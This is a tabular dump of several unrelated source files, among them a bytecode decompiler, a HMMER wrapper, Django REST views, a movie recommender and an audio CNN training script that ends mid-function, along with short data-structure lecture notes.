index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
21,500 | 8162c2d6562c2bd841130ec9b1837d64cb073bf8 | # Day 9 lecture notes
# Review
# The Secret of the Red Dot
# Slides with red dot are MORE IMPORTANT
# than the other slides
# Arrays,set,binsearch,bub sort, sel sort, insert sort, hash, stakcs, queues, recursion
# Ararys
# How the work
# List of objects
# Operations
# Read
# Search
# Insert
# Delete
# Key Concept
# Speed of an opertions
# Measured in steps
# Search
# Looking for something in a DS
# How many steps to a search
# Linear Search - N
# Insert
# End is 1 Steps
# IN middle, have to shift everyhing
# Becomes N at worst
# Delete
# At end is 1 Step
# Anywhere else N steps worst
# Set
# DS that does not allow duplicates
# Reading
# Insert takes 2N + 1 steps
# Must ensure it's not already there
# Ordered array
# Same as array but it's values are kept in order
# Searching takes log N by using binary search
# Big O Notation
# Always represents the growth rate of the algorithm
# Read O(1)
# Search O(N)
# Binary Search O(logN)
# Bubble Sort
# Puts the highest in the right hand side on first pass
# if it doesn't need to swap in a passthrough it stops
# as the array is sorted
# Efficiency O(N^2)
# Opimizing Code W or W/O Big O
# Selection Sort
# it finds smallest number then swaps it with the first
# number
# Insertion Sort
# In worst case, all algo are pretty bad
# But average case
# Insertion is good for MOSTLY sorted data
# Fully Random, doesn't matter
# If it's in reverse order, Selection Sort is best
# Hash Tables
# key,pair values
# Does REALLY REALLY fast reading, O(1)
# Dealing with Collisions
# THis is when you try to add data to a cell that is taken
# You can but a dict in a slot to store multiples
# Worst case performance is O(N)
# Everything in one slot
# Three Factors
# How much data
# How many cells avail in table
# What hash function is being used
# Stacks and Queues
# Temp data
# Stacks LIFO
# Push to stack - end
# Pop from stack - end#
# Queue FIFO
# Push to queue - end
# Pop from queue - front
# Recursion
# a function that calls itself
# find base case, go up from there
# Base Case
# The value in which a method will not recurse
# Stack Overflow
# When you hit in infinite loop with a recursive algorithm# |
21,501 | 53ba024516d68e740f4e8abfc49fb43e6b1c5429 | import re
from ast import literal_eval
from dataclasses import dataclass
from . import operations
COMPREHENSION = 1
GEN_EXPR = 1 << 2
RAW_JUMPS = 1 << 3
@dataclass
class Instruction:
line_num: int
offset: int
opname: str
arg: int
argval: object
def get_code_obj_name(s):
match = re.match(r"<code object <?(.*?)>? at (0x[0-9a-f]+).*>", s)
return match.group(1) + "_" + match.group(2)
def dis_to_instructions(disasm):
""" converts output of dis.dis into list of instructions"""
line_num = None
instructions = []
for line in disasm.split("\n"):
match = re.search(
r"( ?(?P<line_num>\d+)[ >]+)?(?P<offset>\d+) (?P<opname>[A-Z_]+)(?:\s+(?P<arg>\d+)(?: \((?P<argval>.+)\))?)?",
line
)
if match is not None:
if match["line_num"]:
line_num = int(match["line_num"])
offset = int(match["offset"])
opname = match["opname"]
if match["arg"] is not None:
arg = int(match["arg"])
else:
arg = None
if opname == "EXTENDED_ARG":
continue
argval = match["argval"]
instructions.append(Instruction(line_num, offset, opname, arg, argval))
return instructions
def is_store(instruction):
return instruction.opname in ("STORE_FAST", "STORE_NAME", "STORE_GLOBAL", "STORE_DEREF")
def is_identifier(s: str):
return str.isidentifier(s) and s not in ("True", "False", "None")
def instructions_to_asts(instructions, flags=0):
""" converts list of instruction into an AST"""
is_comp = flags & COMPREHENSION
is_genexpr = flags & GEN_EXPR
raw_jumps = flags & RAW_JUMPS
temp_name = "__temp" # name of temporary list/set/etc for comprehensions
indent = 0
arg_names = []
var_names = []
# list of all future changes in indentation (caused by loops,if,etc). format is (offset,change)
indent_changes = []
ast = []
instruction = None
def push(operation):
if raw_jumps:
ast.append((indent,operation,instruction.offset))
else:
ast.append((indent, operation))
def pop():
return ast.pop()[1]
def pop_n(n):
nonlocal ast
if n > 0: # ast[:-0] would be the empty list and ast[-0:] would be every element in ast
if raw_jumps:
ret = [x for _, x,_ in ast[-n:]]
else:
ret = [x for _, x in ast[-n:]]
ast = ast[:-n]
else:
ret = []
return ret
def peek(i=1):
return ast[-i][1]
def dedent_jump_to(offset):
for instruction2 in instructions:
if instruction2.opname == "JUMP_ABSOLUTE" and instruction2.arg == offset:
indent_changes.append((instruction2.offset + 2, -1))
break
def push_invalid(instruction):
push(operations.Invalid(instruction.opname, instruction.arg, instruction.argval))
i = 0
while i < len(instructions):
instruction = instructions[i]
opname = instruction.opname
if indent_changes:
to_remove = []
for indent_change in indent_changes:
if indent_change[0] == instruction.offset:
indent += indent_change[1]
to_remove.append(indent_change)
for indent_change in to_remove:
indent_changes.remove(indent_change)
if opname in ("LOAD_METHOD", "LOAD_ATTR"):
push(operations.Attribute(pop(), instruction.argval))
elif opname.startswith("LOAD"):
var_name = instruction.argval
if var_name.startswith(".") and (is_comp or is_genexpr):
var_name = "__" + var_name[1:]
if is_identifier(var_name):
if opname != "LOAD_GLOBAL" and var_name not in var_names:
arg_names.append(var_name)
var_names.append(var_name)
push(operations.Value(var_name))
elif is_store(instruction):
var_name = instruction.argval
if is_identifier(var_name):
var_names.append(var_name)
push(operations.Assign(var_name, pop()))
elif opname == "YIELD_VALUE":
push(operations.Yield(pop()))
elif opname == "RETURN_VALUE":
if is_comp:
push(operations.Return(operations.Value(temp_name)))
else:
push(operations.Return(pop()))
elif opname == "BUILD_MAP":
count = int(instruction.arg)
args = pop_n(2 * count)
push(operations.BuildMap(args))
elif opname == "BUILD_SLICE":
if instruction.arg == 2:
stop = pop()
start = pop()
push(operations.Slice(start, stop))
else:
step = pop()
stop = pop()
start = pop()
push(operations.Slice(start, stop, step))
elif opname.startswith("BUILD"):
# used to create lists, sets and tuples
operation = opname[len("BUILD_"):]
count = int(instruction.arg)
args = pop_n(count)
push(operations.build_operation(operation)(args))
elif opname == "GET_ITER":
push(operations.Iter(pop()))
elif opname == "FOR_ITER":
iterator = pop()
if isinstance(iterator, operations.Iter):
iterator = iterator.val
assign_op = instructions[i + 1] # get next instruction
i += 1
if is_store(assign_op):
index = assign_op.argval
var_names.append(index)
push(operations.ForLoop([index], iterator))
indent += 1
#detect end of loop
loop_end = int(instruction.argval[len("to "):])
indent_changes.append((loop_end, -1))
elif assign_op.opname == "UNPACK_SEQUENCE":
# loops like for i,j in zip(x,y)
num_vals = assign_op.arg
assign_ops = instructions[i + 1:i + num_vals + 1]
i += num_vals #skip all stores
indicies = []
for op in assign_ops:
var_name = op.argval
var_names.append(var_name)
indicies.append(var_name)
push(operations.ForLoop(indicies, iterator))
indent += 1
#detect end of loop
loop_end = int(instruction.argval[len("to "):])
indent_changes.append((loop_end, -1))
else:
push_invalid(instruction)
elif opname.startswith("POP_JUMP"): # if statements and while loops
val = pop()
if opname.endswith("TRUE"):
val = operations.unary_operation("not")(val)
jump_target = int(instruction.arg)
if raw_jumps:
val=val.val if opname.endswith("TRUE") else operations.unary_operation("not")(val)
push(operations.Jump(jump_target,val))
else:
if jump_target > instruction.offset:
indent_changes.append((jump_target, -1))
for instruction2 in instructions:
if instruction2.offset == jump_target - 2:
is_while = False
if instruction2.opname == "JUMP_ABSOLUTE" and instruction2.arg < instruction.offset:
for instruction3 in instructions:
if instruction3.offset > instruction.offset:
break
if instruction3.offset >= instruction2.arg and (
instruction3.opname.startswith("POP_JUMP") or
instruction3.opname == "FOR_ITER"
):
#either a if statement that is last statement in a loop or a while loop
is_while = instruction3.offset == instruction.offset
break
if is_while:
#instruction before jump target jumps above us and no POP_JUMPs between;
# this is a while loop
push(operations.WhileLoop(val))
if not is_while: # this is a normal if
if opname == "POP_JUMP_IF_TRUE" and instruction2.opname == "POP_JUMP_IF_FALSE":
#TODO: fix if statement with "or" operators
pass
if ast and isinstance(peek(), operations.Else):
pop()
indent -= 1
push(operations.Elif(val))
else:
push(operations.If(val))
break
else:
# this is a if statement that is the last statement in a for loop,
# so it jumps directly to the top of the for loop, so we dedent the JUMP_ABSOLUTE again
dedent_jump_to(jump_target)
push(operations.If(val))
indent += 1
elif opname == "JUMP_ABSOLUTE":
# used for many things, including continue, break, and jumping to the top of a loop
#TODO: continue in while loops
jump_target = int(instruction.arg)
if raw_jumps:
push(operations.Jump(jump_target))
else:
for instruction2 in instructions:
if instruction2.offset == jump_target:
if instruction2.opname == "FOR_ITER":
loop_end = int(instruction2.argval[len("to "):]) - 2
if loop_end != instruction.offset: # this isn't the end of the loop, but its still jumping, so this is a "continue"
if not isinstance(peek(), operations.Break):
push(operations.Continue())
#otherwise this is a normal jump to the top of the loop, so do nothing
else:
for instruction3 in instructions:
if (instruction3.opname == "FOR_ITER" and int(
instruction3.argval[len("to "):]
) == instruction2.offset) or (
instruction3.opname.startswith("POP_JUMP") and
instruction3.arg == instruction2.offset
):
#there is a loop also jumping to the same spot, so this is a "break"
push(operations.Break())
break
break
elif opname == "JUMP_FORWARD":
# used to jump over the else statement from the if statement's branch
jump_target = int(instruction.argval[len("to "):])
if raw_jumps:
push(operations.Jump(jump_target))
else:
indent -= 1
push(operations.Else())
indent += 2
indent_changes.append((jump_target, -1))
elif opname == "IMPORT_NAME":
fromlist = pop()
level = int(pop().val)
if level == 0: #absolute import
next_op = instructions[i + 1]
if is_store(next_op):
i += 1
alias = next_op.argval if next_op.argval != instruction.argval else None
push(operations.Import(instruction.argval, alias))
elif next_op.opname == "IMPORT_FROM":
names = []
i += 1
while next_op.opname == "IMPORT_FROM":
i += 1
assign_op = instructions[i]
names.append(assign_op.argval)
i += 1
next_op = instructions[i]
i -= 1
push(operations.FromImport(instruction.argval, names))
elif next_op.opname == "IMPORT_STAR":
i += 1
push(operations.FromImport(instruction.argval, [operations.Value("*")]))
else:
push_invalid(instruction)
else: #TODO:relative import
push_invalid(instruction)
elif opname == "RAISE_VARARGS":
argc = instruction.arg
if argc == 0:
push(operations.Raise())
elif argc == 1:
push(operations.Raise(pop()))
else:
push(operations.Raise(pop(), pop()))
elif opname in ("CALL_FUNCTION", "CALL_METHOD"):
argc = int(instruction.arg)
args = pop_n(argc)
func = pop()
push(operations.FunctionCall(func, args))
elif opname == "CALL_FUNCTION_KW":
# top of stack is a tuple of kwarg names pushed by LOAD_CONST
kwarg_names = literal_eval(pop().val)
kwargs = {}
for name in kwarg_names:
kwargs[name] = pop()
argc = int(instruction.arg) - len(kwargs)
args = pop_n(argc)
func = pop()
push(operations.FunctionCall(func, args, kwargs))
elif opname == "CALL_FUNCTION_EX":
if instruction.arg & 1: #lowest bit set
kwargs = pop()
args = pop()
func = pop()
push(
operations.FunctionCall(
func, [operations.UnpackSeq(args),
operations.UnpackDict(kwargs)]
)
)
else:
args = pop()
func = pop()
push(operations.FunctionCall(func, [operations.UnpackSeq(args)]))
elif opname == "MAKE_FUNCTION": # list comps, lambdas and nested functions
#TODO: handle the other flags
flags = instruction.arg
pop() # qualified name
code_obj = pop()
func_name = get_code_obj_name(code_obj.val)
if flags & 8:
closure_vars = pop().args
push(operations.Closure(func_name, closure_vars))
else:
push(operations.Value(func_name))
elif opname in ("LIST_APPEND", "SET_ADD"): #used in comprehensions
func = opname[opname.index("_") + 1:].lower()
if is_comp:
push(
operations.FunctionCall(
operations.Attribute(operations.Value(temp_name), operations.Value(func)),
[pop()]
)
)
else:
push_invalid(instruction)
elif opname == "MAP_ADD": #used in dict comprehensions
if is_comp:
key = pop()
val = pop()
push(operations.SubscriptAssign(key, operations.Value(temp_name), val))
else:
push_invalid(instruction)
elif opname == "UNPACK_SEQUENCE":
push(operations.UnpackSeq(pop()))
elif opname == "UNPACK_EX": # unpacking assignment
num_vals_before = instruction.arg & 0xff
num_vals_after = (instruction.arg >> 8) & 0xff #high byte
num_vals = num_vals_before + num_vals_after
assign_ops = []
for j in range(num_vals_before):
assign_ops.append(instructions[i + j + 1])
j += 1
assign_op = instructions[i + j + 1]
if is_store(assign_op): #list unpack
num_vals += 1
assign_op.argval = "*" + assign_op.argval
assign_ops.append(assign_op)
j += 1
for j in range(j, j + num_vals_after):
assign_ops.append(instructions[i + j + 1])
i += num_vals #skip all stores
names = []
for op in assign_ops:
var_name = op.argval
var_names.append(var_name)
names.append(var_name)
push(operations.Assign(operations.build_operation("tuple")(names), pop()))
elif opname == "COMPARE_OP":
right = pop()
left = pop()
push(operations.Comparison(instruction.argval, left, right))
elif opname == "BINARY_SUBSCR":
if isinstance(peek(), operations.Slice):
slice_ = pop()
val = pop()
push(operations.SubscriptSlice(val, slice_.start, slice_.stop, slice_.step))
else:
subscript = pop()
val = pop()
push(operations.Subscript(val, subscript))
elif opname == "STORE_SUBSCR":
push(operations.SubscriptAssign(pop(), pop(), pop()))
elif opname.startswith("UNARY"):
operation = opname[len("UNARY_"):]
push(operations.unary_operation(operation)(pop()))
elif opname.startswith("BINARY"):
operation = opname[len("BINARY_"):]
right = pop()
left = pop()
push(operations.binary_operation(operation)(left, right))
elif opname.startswith("INPLACE"):
operation = opname[len("INPLACE_"):]
right = pop()
left = pop()
if is_store(instructions[i + 1]):
i += 1
push(operations.inplace_operation(operation)(left, right))
else:
push_invalid(instruction)
elif opname not in ("NOP", "POP_TOP"):
push_invalid(instruction)
if i == 0 and is_comp: #give the temporary for list comps a name
push(operations.Assign(operations.Value(temp_name), pop()))
i += 1
return (ast, arg_names)
def asts_to_code(asts, flags=0,tab_char="\t"):
""" converts an ast into python code"""
if flags& RAW_JUMPS:
max_offset_len = len(str(asts[-1][2]))
return "\n".join(str(offset).ljust(max_offset_len," ") + tab_char * (indent + 1) + str(ast) for indent, ast, offset in asts)
else:
return "\n".join(tab_char * indent + str(ast) for indent, ast in asts)
def decompile(disasm, flags=0, tab_char="\t"):
instructions = dis_to_instructions(disasm)
asts, arg_names = instructions_to_asts(instructions, flags)
return asts_to_code(asts, flags,tab_char), arg_names
def split_funcs(disasm):
""" splits out comprehensions from the main func or functions from the module"""
start_positions = [0]
end_positions = []
names = []
if not disasm.startswith("Disassembly"):
names.append("main")
for match in re.finditer(r"Disassembly of (.+):", disasm):
end_positions.append(match.start())
start_positions.append(match.end())
name = match.group(1)
if name.startswith("<"):
names.append(get_code_obj_name(name))
else:
names.append(name)
end_positions.append(len(disasm))
if disasm.startswith("Disassembly"):
start_positions.pop(0)
end_positions.pop(0)
for start, end, name in zip(start_positions, end_positions, names):
yield (name, disasm[start:end])
def get_flags(name):
if name.startswith("genexpr"):
return GEN_EXPR
elif "comp" in name:
return COMPREHENSION
else:
return 0
def decompile_all(disasm,flags=0,tab_char="\t"):
disasm = re.sub(r"^#.*\n?", "", disasm, re.MULTILINE).strip() # ignore comments
for name, func in split_funcs(disasm):
yield name, *decompile(func, get_flags(name)|flags, tab_char)
def pretty_decompile(disasm,flags=0,tab_char="\t"):
ret = []
for name, code, arg_names in decompile_all(disasm, flags, tab_char):
ret.append(
f"def {name}({','.join(arg_names)}):\n" +
"\n".join(tab_char + line for line in code.split("\n"))
)
return "\n".join(ret)
|
21,502 | ee63f82268118aceb4453b78ed60a62e4dda5f49 | # 模N 位置,内容不变的list 的判断
def SameCycle(base, test):
# 长度不等
if not len(base) == len(test):
return False
S_b = set(base)
S_t = set(test)
# 内容不等
if not S_b == S_t:
return False
# 序列 + 内容 不等
first_base = base[0]
first_base_in_test = test.index(first_base)
for index in range(len(base)):
if not base[index] == test[(index + first_base_in_test) % len(base)]:
return False
return True
|
21,503 | 3f1a963fea126d2047ceda66dfa0f1adeed2aba3 | #-*- coding:utf8 -*-
import sys
from conf.options import actions
def help_msg():
"""
打印可选操作参数
:return:
"""
for k,v in actions.items():
print (k)
def from_command_run(argvs):
#如果不跟选项,打印帮助,退出
if len(argvs) < 2:
help_msg()
exit()
#如果选项不存在,报错退出
if argvs[1] not in actions:
sys.stderr.write('\033[1;33mOptions [%s] is not exists;\33[0m')
exit()
#将参数传递给函数,根据views执行相应操作
actions[argvs[1]](argvs[1:])
|
21,504 | 1bdd10384564552ba0fb9db01e60e1e9bdf4cff7 | # Copyright 2016 by Joao Rodrigues. All rights reserved.
# This code is part of the pydca distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""
Wrapper class to produce a single Stockholm file with custom annotations from a
jackhmmer/phmmer sequence search.
Depends heavily on Biopython SearchIO and AlignIO modules.
"""
from __future__ import print_function
from collections import namedtuple
import logging
import os
import tempfile
try:
# Python 3.3+
from shutil import which as _which
except ImportError:
def _which(executable):
"""
Returns None if the executable is not found in the PATH.
Source: http://stackoverflow.com/a/377028
"""
def is_exe(fpath):
"""Returns True if the path is an executable"""
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, _ = os.path.split(executable)
if fpath:
if is_exe(executable):
return executable
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, executable)
if is_exe(exe_file):
return exe_file
return None
try:
from Bio import SeqIO
from Bio.Alphabet.IUPAC import IUPACProtein
from Bio.Alphabet import _verify_alphabet
except ImportError, err:
raise ImportError('[!] Could not import one or more biopython modules: {}'.format(err))
# Constants
CANONICAL_AA1 = set('ACDEFGHIKLMNPQRSTVWY')
# Classes
class HMMERRuntimeError(Exception):
"""Custom class to throw exceptions related to running HMMER"""
pass
class ParseError(Exception):
"""Custom class to throw exceptions related to parsing input/output"""
pass
class HMMERWrapper(object):
"""Wraps phmmer/jackhmmer to produce a custom-annotated Stockholm file.
Uses Biopython to call HMMER (default jackhmmer) on one or more protein sequences (file
or handle) and parses several output files to create a unified Stockholm file with the
full aligned sequences and a set of features for each hit (e.g. uniprot accession, hit
e-value, etc) and a set of per-file annotations (e.g. number of sequences, sequence
length, original HMMER parameters, etc). This file is a suitable input to create an
Alignment object.
Args:
sequence: sequence file, open file handle, or string with the data in FASTA format
database: a string with the path to the sequence database against which to run HMMER
executable: a string with the HMMER executable to call (optional) [def: jackhmmer]
evalue: a number in scientific notation with the expectation value threshold (optional)
ncpus: an integer with the number of CPUs to use in the HMMER calculation (optional)
niter: an integer with the number of iterations to use in jackhmmer (optional)
cleanup: a boolean to remove all files produced by HMMER
mock: a boolean to block the actual call to HMMER (use for testing only)
Returns:
stockof: the path to the Stockholm output file.
Raises:
HMMERRuntimeError: An error occured while executing HMMER.
ParseError: An error occured while parsing the output of HMMER.
OSError: HMMER executable cannot be found.
TypeError: input/output does not match expected format.
"""
def __init__(self, sequence, database=None, executable='jackhmmer', **kwargs):
# Empty container for parsed/validated sequences
self.sequences = []
self.database = database
# Setup logging with module name
self.logger = logging.getLogger(__name__)
# Iterate over kwargs and define defaults if not user-provided
_defaults = {'evalue': 1E-20,
'ncpus': 2,
'niter': 5,
'mock': False}
for kwarg in _defaults:
kwarg_val = kwargs.get(kwarg)
if not kwarg_val:
kwarg_val = _defaults[kwarg]
setattr(self, kwarg, kwarg_val)
# Validate sequence data and locate executable
self.__validate(sequence)
if not _which(executable):
raise OSError("HMMER executable not found in PATH: '{}'".format(executable))
# run HMMER
def __validate(self, seqdata):
"""Verifies the user provided input is either a file or a file-like object
containing sequence data.
Args:
seqdata: a string (path to file) or file-like object.
Returns:
A list with one namedtuple per input sequence.
Raises:
TypeError: if the input is not a string or a file-like object.
ParseError: if the sequence contains others than the 20 canonical AAs.
"""
_Sequence = namedtuple('Seq', ['name', 'data'])
# file-like object
# isinstance(obj, file) does not hold in Py3
if hasattr(seqdata, 'read') and hasattr(seqdata, 'name'):
self.logger.debug('Reading data from file-like object {}'.format(seqdata.name))
fname = seqdata.name
elif isinstance(seqdata, basestring):
self.logger.debug('Reading data from file path {}'.format(seqdata))
fname = seqdata
# can be file name string or sequence
if not os.path.isfile(fname):
raise OSError('Sequence file not found: {}'.format(seqdata))
else:
raise TypeError('Sequence input format not recognized: {}'.format(seqdata))
# parse and validate sequences
# defining these two a prior just in case later we decide to support more stuff
_seq_alphabet = IUPACProtein()
_seq_format = 'fasta'
seq_iterator = SeqIO.parse(seqdata, _seq_format, alphabet=_seq_alphabet)
for seq_i, seq_record in enumerate(seq_iterator, start=1):
seq_name = seq_record.name
seq_raw = str(seq_record.seq)
if not _verify_alphabet(seq_record.seq):
msg = 'Entry #{} ({}) in {} is not a valid protein sequence'
raise ParseError(msg.format(seq_i, seq_name, fname))
self.sequences.append(_Sequence(seq_name, seq_raw))
return self.sequences
def run(self):
"""Launches the HMMER executable on the user data"""
pass
|
21,505 | d01e228374550e9192aaa0b139622bef6912888e | from rest_framework.viewsets import ModelViewSet
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from rest_framework_jwt.settings import api_settings
from rest_framework.authtoken.serializers import AuthTokenSerializer
from django.contrib.auth import authenticate, login
from rest_framework.views import APIView, status
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from app.serializers import UserSerializer, ArticlesSerializer, TokenSerializer
from app.permissions import IsOwnerOrReadOnly
from app.models import Articles
from app.models import User
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
# Create your views here.
class UserViewSet(ModelViewSet):
"""UserViewSet Class"""
serializer_class = UserSerializer
queryset = User.objects.all().order_by('id')
permission_classes = [IsAuthenticatedOrReadOnly, ]
http_method_names = ['get', 'post']
class ArticlesViewSet(ModelViewSet):
"""ArticlesViewSet Class"""
serializer_class = ArticlesSerializer
queryset = Articles.objects.all()
permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]
http_method_names = ['get', 'post', 'put', 'delete']
def perform_create(self, serializer):
serializer.save(author=self.request.user)
class LoginViewSet(ViewSet):
""" checks username and password and return auth token """
serializer_class = AuthTokenSerializer
def create(self, request):
""" Use the ObtainAuthToken APIView to validate and create a token """
username = request.data.get('username', '')
password = request.data.get('password', '')
user = authenticate(request, username=username, password=password)
if user is not None:
# login saves the user’s ID in the session,
# using Django’s session framework.
login(request, user)
serializer = TokenSerializer(data={
# using drf jwt utility functions to generate a token
'token': jwt_encode_handler(
jwt_payload_handler(user)
)})
serializer.is_valid()
return Response(serializer.data, message='login successful')
return Response(
{"message": "Invalid credentials"},
status=status.HTTP_401_UNAUTHORIZED
)
|
21,506 | 7918a765315aedf88d1d009e51c74e246896f155 | # TwitterTag.py
# (C)2012
# Scott Ernst
import string
from StaticFlow.render.enum.GeneralSizeEnum import GeneralSizeEnum
from StaticFlow.render.enum.TagAttributesEnum import TagAttributesEnum
from StaticFlow.render.tags.MarkupTag import MarkupTag
from pyaid.json.JSON import JSON
from pyaid.string.StringUtils import StringUtils
#___________________________________________________________________________________________________ TwitterTag
class TwitterTag(MarkupTag):
"""A class for..."""
#===================================================================================================
# C L A S S
TAG = 'twitter'
TEMPLATE = 'markup/external/twitter.mako'
BLOCK_DISPLAY = True
PRIMARY_ATTR = TagAttributesEnum.SEARCH[0]
#===================================================================================================
# P U B L I C
#___________________________________________________________________________________________________ getAttributeList
@classmethod
def getAttributeList(cls):
t = TagAttributesEnum
return MarkupTag.getAttributeList() + t.SEARCH + t.HEIGHT + t.COUNT + t.START + t.STOP + \
t.IGNORE + t.TITLE + t.SUBTITLE + t.COUNT + t.SCROLL + t.TIME + t.LOOP
#===================================================================================================
# P R O T E C T E D
#___________________________________________________________________________________________________ _renderImpl
def _renderImpl(self, **kwargs):
if self._processor.globalVars:
self._processor.globalVars.includeTwitterWidgetAPI = True
a = self.attrs
q = a.get(TagAttributesEnum.SEARCH, '@vizme', kwargs)
start = a.get(TagAttributesEnum.START, None, kwargs)
stop = a.get(TagAttributesEnum.STOP, None, kwargs)
skips = a.get(TagAttributesEnum.IGNORE, None, kwargs)
height = a.getAsEnumerated(TagAttributesEnum.HEIGHT, GeneralSizeEnum, GeneralSizeEnum.medium)
title = a.get(TagAttributesEnum.TITLE, '', kwargs)
subtitle = a.get(TagAttributesEnum.SUBTITLE, '', kwargs)
count = a.get(TagAttributesEnum.COUNT + TagAttributesEnum.TWEETS, 10, kwargs)
scrollbar = a.getAsBool(TagAttributesEnum.SCROLL, count > 5, kwargs)
interval = a.getAsInt(TagAttributesEnum.TIME, 5, kwargs)
loop = a.getAsBool(TagAttributesEnum.LOOP, interval > 0, kwargs)
if not isinstance(q, list):
q = [q]
user = len(q) == 1 and q[0].startswith('@') and not StringUtils.contains(q[0], [' ', ','])
q = u' OR '.join(q)
if height in ['none', 'm']:
height = 300
elif height == 'xxs':
height = 100
elif height == 'xs':
height = 175
elif height == 's':
height = 250
elif height == 'l':
height = 375
elif height == 'xl':
height = 450
elif height == 'xxl':
height = 525
else:
height = 300
if skips:
user = False
q += u' ' + (u'-' + skips if isinstance(skips, basestring) else u' -'.join(skips))
if start or stop:
user = False
if start:
q += u' since:' + start
if stop:
q += u' until:' + stop
data = {
'id':a.id.get(),
'version':2,
'width':'auto',
'height':height,
'interval':1000*interval,
'theme': {
'shell': {
'background': a.backColors.baseColor.web,
'color': a.focalColors.highlightColor.web
},
'tweets': {
'background': a.backColors.baseColor.web,
'color': a.focalColors.baseColor.web,
'links': a.focalColors.linkColor.web
}
},
'features': {
'scrollbar':scrollbar,
'loop':loop,
'live':interval > 0,
'behavior': u'all' if user else u'default'
},
'type': 'profile' if user else 'search'
}
if user:
a.render['setUser'] = u'.setUser("' + q + u'")'
data['rpp'] = count
else:
a.render['setUser'] = u''
data['search'] = q
data['title'] = subtitle.capitalize() if subtitle else string.capwords(q)
data['subject'] = title.capitalize() if title else string.capwords(q.split(' ')[0])
a.render['twitterData'] = JSON.asString(data).replace("'", "\\'")
#___________________________________________________________________________________________________ _renderImpl
def _getAsBooleanString(self, test):
return u'true' if test else u'false'
|
21,507 | d6975b5994b500cf885ae5768cdacc778b7d3d1e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import implicit
import pandas as pd
from scipy.sparse import coo_matrix
import heapq
# read first 3 columns into a dataframe
dataFile = './data/u.data'
data = pd.read_csv(dataFile, sep='\t', header=None, usecols=[0,1,2], names=['userId','itemId','rating'])
# print(data.head())
# convert dataframe to matrix of users v items, with ratings as values
data['userId'] = data['userId'].astype('category')
data['itemId'] = data['itemId'].astype('category')
rating_matrix = coo_matrix((
data['rating'].astype(float),
(
data['itemId'].cat.codes.copy(),
data['userId'].cat.codes.copy(),
)
))
# split matrix into users v factors and factors v items matrices, using als algorithm
model = implicit.als.AlternatingLeastSquares(factors=10, regularization=0.1)
model.fit(rating_matrix)
user_factors, item_factors = model.item_factors, model.user_factors
# to get the predicted ratings for all movies by this user:
# take one row from the user_factors matrix - which represents one user
# then take dot product of that row with all the columns in the item factors
user196 = item_factors.dot(user_factors[196])
# then sort these ratings in descending order and pick the top3 rated movies recommended for this user
recommendations = heapq.nlargest(3, range(len(user196)), user196.take)
print(recommendations)
|
21,508 | 119e2072580a91c14cee2138a8eb2bbea82492ed | #!/usr/bin/env python3
import time
from multiprocessing import cpu_count
from typing import Union, NamedTuple
from dataset import UrbanSound8KDataset
from model import CNN
from trainer import Trainer
import torch
import torch.backends.cudnn
import numpy as np
from torch import nn, optim
from torch.nn import functional as F
import torchvision.datasets
from torch.optim.optimizer import Optimizer
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from torchvision import transforms
import argparse
from pathlib import Path
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser(
description="Train a simple CNN on CIFAR-10",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
default_dataset_dir = Path.home() / ".cache" / "torch" / "datasets"
parser.add_argument("--dataset-root", default=default_dataset_dir)
parser.add_argument("--log-dir", default=Path("logs"), type=Path)
parser.add_argument("--learning-rate", default=1e-3, type=float, help="Learning rate")
parser.add_argument(
"--batch-size",
default=32,
type=int,
help="Number of images within each mini-batch",
)
parser.add_argument(
"--epochs",
default=50,
type=int,
help="Number of epochs (passes through the entire dataset) to train for"
)
parser.add_argument(
"--val-frequency",
default=2,
type=int,
help="How frequently to test the model on the validation set in number of epochs",
)
parser.add_argument(
"--log-frequency",
default=10,
type=int,
help="How frequently to save logs to tensorboard in number of steps",
)
parser.add_argument(
"--print-frequency",
default=10,
type=int,
help="How frequently to print progress to the command line in number of steps",
)
parser.add_argument(
"-j",
"--worker-count",
default=cpu_count(),
type=int,
help="Number of worker processes used to load data.",
)
parser.add_argument(
"--checkpoint-path",
default=Path("checkpointLMC.pkl"),
type=Path,
help="Provide a file to store checkpoints of the model parameters during training."
)
parser.add_argument(
"--checkpoint-frequency",
type=int,
default=10,
help="Save a checkpoint every N epochs"
)
parser.add_argument(
"--mode",
default="LMC",
type=str,
help="LMC, MC, or MLMC"
)
parser.add_argument(
"--dropout",
default=0.5,
type=float,
)
parser.add_argument(
"--weight-decay",
default=1e-3,
type=float,
)
if torch.cuda.is_available():
DEVICE = torch.device("cuda")
else:
DEVICE = torch.device("cpu")
def main(args):
transform = transforms.ToTensor()
args.dataset_root.mkdir(parents=True, exist_ok=True)
train_loader = torch.utils.data.DataLoader(
UrbanSound8KDataset('UrbanSound8K_train.pkl', mode=args.mode),
batch_size=32, shuffle=True,
num_workers=8, pin_memory=True)
test_loader = torch.utils.data.DataLoader(
UrbanSound8KDataset('UrbanSound8K_test.pkl', mode=args.mode),
batch_size=32, shuffle=False,
num_workers=8, pin_memory=True)
# Change the input dimensions if we are using MLMC.
# Direct user to correct file if they want to use TSCNN.
if args.mode == "LMC" or args.mode == "MC":
model = CNN(height=85, width=41, channels=1, class_count=10, dropout=args.dropout, mode=args.mode)
elif args.mode == "MLMC":
model = CNN(height=145, width=41, channels=1, class_count=10, dropout=args.dropout, mode=args.mode)
elif args.mode == "TSCNN":
print("Use file late_fusion.py to run TSCNN with trained LMCNet and MCNet")
criterion = nn.CrossEntropyLoss()
# Paper specifies "variant of stochastic gradient descent" with reference
# pointing to Adam. Weight decay used for L2 regularisation.
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate, weight_decay=args.weight_decay)
log_dir = get_summary_writer_log_dir(args)
print(f"Writing logs to {log_dir}")
summary_writer = SummaryWriter(
str(log_dir),
flush_secs=5
)
